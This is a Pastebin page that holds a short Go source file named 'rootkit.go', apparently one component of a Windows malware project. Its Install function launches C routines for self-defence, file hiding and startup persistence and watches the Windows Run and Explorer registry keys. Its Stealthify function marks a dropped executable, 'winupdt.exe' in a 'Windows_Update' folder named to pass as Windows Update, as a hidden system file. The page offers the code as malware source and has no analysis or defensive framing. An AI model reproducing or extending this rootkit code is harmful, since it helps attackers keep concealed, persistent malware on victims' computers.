Advertisement
FlyFar

rootkit.go

Jul 15th, 2023
1,262
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Go 0.64 KB | Cybersecurity | 0 0
  1. package rootkit
  2.  
  3. import (
  4.     "os/exec"
  5.     /*
  6.         extern _Bool SelfDefense();
  7.         extern void hideFiles();
  8.         extern void fixStartup();
  9.         extern void WatchReg(char *watch, _Bool watchType);
  10.     */
  11.     "C"
  12. )
  13.  
  14. func Install() {
  15.     go C.SelfDefense();
  16.     go C.WatchReg(C.CString("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"), true);
  17.     go C.WatchReg(C.CString("Software\\Microsoft\\Windows\\CurrentVersion\\Run"), false);
  18.     go Stealthify()
  19. }
  20.  
  21. func Stealthify() {
  22.     run("attrib +S +H %APPDATA%\\Windows_Update")
  23.     run("attrib +S +H %APPDATA%\\Windows_Update\\winupdt.exe")
  24. }
  25.  
  26. func run(cmd string) {
  27.     exec.Command("cmd", "/C", cmd).Run()
  28. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement